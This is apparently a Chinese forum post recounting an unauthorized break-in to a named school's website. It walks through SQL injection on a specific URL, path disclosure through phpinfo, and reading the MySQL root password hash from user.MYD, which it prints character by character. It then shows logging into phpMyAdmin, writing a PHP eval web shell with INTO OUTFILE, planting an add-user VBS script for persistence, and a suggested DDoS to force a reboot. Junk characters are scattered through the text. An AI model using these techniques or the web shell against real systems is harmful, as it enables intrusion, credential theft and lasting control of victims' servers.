友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
2 t" T3 \/ x: |


" N( j# n+ H, d. P# w常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

: t. m7 O- ~7 j. B4 ~5 X' Q那么想可以直接写入shell ，getshell有几个条件：
2 K; N. u* Y6 l8 A0 z9 e8 Q

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

试着爆绝对路径：
& G: T1 Z2 k' ~$ S1./phpMyAdmin/index.php?lang[]=1  
) d2 n* a- |/ f: r8 p2./phpMyAdmin/phpinfo.php  
3./load_file()  
% P$ E6 y0 V+ V1 M2 @6 h, e9 }4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
: ?. z& d6 F% s8./phpmyadmin/libraries/export/xls.php  

均不行...........................
3 c8 W" R' ^+ x' n( g$ t0 f$ ]
御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
  E& a7 S5 l2 q: h. T
权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

1 o" F3 t9 k2 c6 y+ z1 O' y8 a敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
0 P  S+ r* R: w& I4 C
想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
: Q5 o0 T3 W4 T- I$ i. }
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini
' `1 Z' ?# b1 f3 X# U4 `
自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD
5 v8 I+ ~2 ]! {  f7 s# B
成功读到root密码：
, h+ Z8 A: P  w
! d3 Q6 e; W! B9 R6 g17---- r(0072)
& d# J' j, Z/ G5 M6 {, [18---- o(006f)
19---- o(006f)
0 _- ?1 k0 S+ [; Q( ]+ s: ]' k20---- t(0074)
21---- *(002a)
6 E# k) C/ r8 v/ b+ M, S22---- 8(0038)
23---- 2(0032)
- w1 P8 B( s( K24---- E(0045)
9 Y) k6 ?! F$ J% R$ E1 R: u+ p5 @& g+ y25---- 1(0031)
8 p, n: g1 [3 |" Z26---- C(0043)
27---- 5(0035)
" v; N- ?" H- U28---- 8(0038)
) J2 r  G. ?9 J1 `& b* `+ @: t29---- 2(0032)
% B1 N+ c2 d  Z3 J$ b) y1 |+ f30---- 8(0038)
31---- A(0041)
32---- 9(0039)
1 u- z2 V" l3 d  l1 n33---- B(0042)
* T5 c8 G/ B9 j( A34---- 5(0035)
35---- 4(0034)
# f' Q5 X5 A) L36---- 8(0038)
37---- 6(0036)
38---- 4(0034)
39---- 9(0039)
40---- 1(0031)
0 T6 U0 m. B9 G: z6 A41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
44---- 5(0035)
45---- 9(0039)
2 L0 ^5 I; L6 l" j( W46---- 8(0038)
+ E0 L# {9 Q, _, R1 B. R47---- F(0046)
48---- F(0046)
6 ]& s1 B0 e) T6 d7 O49---- 4(0034)
50---- F(0046)
% P/ K. u% }3 d51---- 0(0030)
. Z# o) H/ N; X52---- 3(0033)
8 n4 U9 y1 g% X. q+ n: g0 f53---- 2(0032)
54---- A(0041)
55---- 4(0034)
56---- A(0041)
4 q- G1 X$ F% }57---- B(0042)
5 Q" W3 t" R/ j* K* h* Z8 C58---- *(0044)
& o  r: M/ A) K8 E2 e) M7 o. y6 T59---- *(0035)
60---- *(0041)
5 L3 }, A5 N1 o% B& O61---- *0032)

0 U1 \8 b, ^' Y( x  _/ ^" N- H0 A/ \解密后成功登陆phpmyamin
) _! O( a0 F3 Q- `) W+ ]1 S# _7 ~                          

                             
. V. x4 j6 D7 r* Q5 ^/ {) J  Q
找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'

成功执行，拿下shell，菜刀连接：

4 ^/ |6 ]* ~/ m. j: h5 d6 P: J. l" h服务器不支持asp,aspx,php提权无果...................
: |1 e) q$ a& b  Q$ l
但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
# I7 l( Y' A' K7 Y$ y- [! y7 O% ]

服务器上已经有个隐藏帐号了

* w/ t" J0 u9 ^" O  H# d

别名     administrators
7 d- j- s3 ]8 K& H" H1 P: f) x注释     管理员对计算机/域有不受限制的完全访问权

2 Q; O& P4 W1 {. k9 @+ K+ s; C

成员

-------------------------------------------------------------------------------
admin
3 ^9 {. @  g+ P* E. x+ fAdministrator
9 ]+ L6 l- ]# }- F- D/ }slipper$
sqluser
8 S$ G0 X; _9 t3 x6 Z; Q, B3 k- d命令成功完成。
8 s- S/ I) X' U$ k( h# w: B3 {
1 u0 Q; g  B, s6 w4 p服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
9 x; P& W0 Q* v$ E
ddos服务器重启，不然就只能坐等服务器重启了...............................
& |$ Q5 K4 f3 i5 ^4 m
0 `: m. i% Z! i4 ~      

angel